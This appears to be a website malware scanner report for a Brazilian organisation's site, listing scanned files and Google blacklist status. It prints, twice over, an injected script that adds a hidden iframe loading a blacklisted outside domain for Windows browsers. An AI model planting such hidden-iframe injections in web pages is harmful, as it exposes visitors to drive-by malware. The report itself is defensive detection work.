New scan:

Malware Scanner report for acmp-ce.org.br

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "acmp-ce.org.br" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=acmp-ce.org.br

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://acmp-ce.org.br/
200 OK
Content-Length: 41898
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: anadoluengellilerkenti.com

...[3331 bytes skipped]...
/>}
function showBrowVer()
{
var data = browserDetectNav();
if (data[0]) {
if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/';
js_kod2.width = '5px';
js_kod2.height = '3px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
}
}

Decoded script:


function showBrowVer() {
var data = browserDetectNav();
if (data[0]) {
if ((data[0] == "Opera" || data[0] == "MSIE" || data[0] == "Firefox") & data[3] == "Windows") {
var divTag = document.createElement("div");
divTag.id = "dt";
document.body.appendChild(divTag);
var js_kod2 = document.createElement("iframe");
js_kod2.src = "http://anadoluengellilerkenti.com/img/trans/";
js_kod2.width = "5px";
js_kod2.height = "3px";
js_kod2.setAttribute("style", "visibility:hidden");
document.getElementById("dt").appendChild(js_kod2);
}
}
}

http://acmp-ce.org.br/media/system/js/mootools-core.js
200 OK
Content-Length: 96362
Content-Type: application/javascript
clean
http://acmp-ce.org.br/media/system/js/core.js
200 OK
Content-Length: 4784
Content-Type: application/javascript
clean
http://acmp-ce.org.br/media/system/js/caption.js
200 OK
Content-Length: 729
Content-Type: application/javascript
clean
https://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://acmp-ce.org.br/plugins/system/jqueryeasy/jquerynoconflict.js
200 OK
Content-Length: 20
Content-Type: application/javascript
clean
http://acmp-ce.org.br/components/com_k2/js/k2.js?v2.6.7&sitepath=/
200 OK
Content-Length: 8007
Content-Type: application/javascript
clean
http://acmp-ce.org.br/libraries/gantry/js/browser-engines.js
200 OK
Content-Length: 4026
Content-Type: application/javascript
clean
http://acmp-ce.org.br/templates/gantry/js/html5shim.js
200 OK
Content-Length: 2394
Content-Type: application/javascript
clean
http://acmp-ce.org.br/media/system/js/mootools-more.js
200 OK
Content-Length: 238331
Content-Type: application/javascript
clean
http://acmp-ce.org.br/modules/mod_rokajaxsearch/js/rokajaxsearch.js
200 OK
Content-Length: 24083
Content-Type: application/javascript
clean
http://www.acmp-ce.org.br/modules/mod_bt_login/tmpl/js/jquery.simplemodal.js
200 OK
Content-Length: 9769
Content-Type: application/javascript
clean
http://www.acmp-ce.org.br/modules/mod_bt_login/tmpl/js/default.js
200 OK
Content-Length: 14074
Content-Type: application/javascript
clean
http://acmp-ce.org.br/index.php/area-do-associado-login?view=reset
200 OK
Content-Length: 31043
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: anadoluengellilerkenti.com

...[3331 bytes skipped]...
/>}
function showBrowVer()
{
var data = browserDetectNav();
if (data[0]) {
if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/';
js_kod2.width = '5px';
js_kod2.height = '3px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
}
}

Decoded script:


function showBrowVer() {
var data = browserDetectNav();
if (data[0]) {
if ((data[0] == "Opera" || data[0] == "MSIE" || data[0] == "Firefox") & data[3] == "Windows") {
var divTag = document.createElement("div");
divTag.id = "dt";
document.body.appendChild(divTag);
var js_kod2 = document.createElement("iframe");
js_kod2.src = "http://anadoluengellilerkenti.com/img/trans/";
js_kod2.width = "5px";
js_kod2.height = "3px";
js_kod2.setAttribute("style", "visibility:hidden");
document.getElementById("dt").appendChild(js_kod2);
}
}
}

http://acmp-ce.org.br/media/system/js/validate.js
200 OK
Content-Length: 2950
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: acmp-ce.org.br

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 15 Apr 2014 21:40:40 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3d85ff3b5fa8297843911f13b3def78f=pa0kvmaa38qa30kugb3n44kgb6; path=/
X-Logged-In: False
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: acmp-ce.org.br
Referer: http://www.google.com/search?q=acmp-ce.org.br

Result:
The result is similar to the first query. There are no suspicious redirects found.